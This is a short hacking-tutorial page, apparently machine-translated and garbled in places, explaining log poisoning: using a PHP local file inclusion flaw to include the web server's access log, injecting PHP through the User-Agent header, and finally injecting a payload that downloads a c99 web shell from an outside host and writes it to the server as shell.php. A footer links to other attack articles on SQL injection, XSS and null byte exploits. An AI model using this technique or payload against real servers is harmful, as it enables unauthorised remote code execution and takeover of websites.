Log poisoning is a technique that not many know about.
this technique works only if you can make an LFI of the page.
if we say that you call index.php, which is vulnerable to LFI
and writes index.php? inc =../../../ var / www / logs / access.log

So you see that it will produce a logfile.
that looks something like this:
11.11.11.11 – – [05/Feb/2004: 21:34:01 -0600] “GET / tindex.php? Inc = HTTP/1.1” 200 230 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1 ; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – – [05/Feb/2004: 21:34:04 -0600] “GET / tindex.php? Inc =../../../ etc / passwd HTTP/1.1” 200 175 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11”
11.11.11.11– [05/Feb/2004: 21:34:07 -0600] “GET / index.php? Inc = test.php HTTP/1.1” 200 134 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – – [05/Feb/2004: 21:34:08 -0600] “GET / index.php? Inc =../../../ var / www / logs / access.log HTTP/1.1 “200 164” – “” Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”

As you can see logs serve our user-agent
If we change our user-agent to: <? Php echo ‘test’;?>
Can we hope the following restultat:
11.11.11.11 – – [05/Feb/2004: 21:34:01 -0600] “GET / tindex.php? Inc = HTTP/1.1” 200 230 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1 ; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – – [05/Feb/2004: 21:34:04 -0600] “GET / tindex.php? Inc =../../../ etc / passwd HTTP/1.1” 200 175 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11”
11.11.11.11– [05/Feb/2004: 21:34:07 -0600] “GET / index.php? Inc = test.php HTTP/1.1” 200 134 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – – [05/Feb/2004: 21:34:08 -0600] “GET / index.php? Inc =../../../ var / www / logs / access.log HTTP/1.1 “200 164” – “” test ”
As you can see, were running our PHP question.
change it as our user-agent to:
<? php fwrite (fopen ( ‘shell.php’, ‘w’), file_get_contents ( ‘hxxp: / / hack3r.org/path/to/c99.txt’)); die;?>
so it creates a file called shell.php with our shell script in.
And wopidoo, we have shell access.

Explore More

Critical SQL Injection in National Library, Ministry of Culture

PlanetCreator has reported another critical SQL Injection (vulnerability) on National Library, Ministry of Culture Website http://www.nlm.gov.mm/ SQL injection is a code injection technique that exploits a security vulnerability occurring in

Read More

XSS The Complete Walkthrough

Author: t0pP8uZz Description: Complete tutorial on XSS methods. Homepage: G0t-Root.net, H4cky0u.org, Milw0rm.com Date: 24/07/07 Chapters: What is XSS? Finding XSS Vulnerbilitys The Basics On XSS Deface Methods Cookie Stealing Filteration

Read More

The Null Byte Exploit

Many web forums have mushroomed on internet and they are setup in a jiffy,so they wont pay much attention to security. An older exploit I m discussing here is The

Read More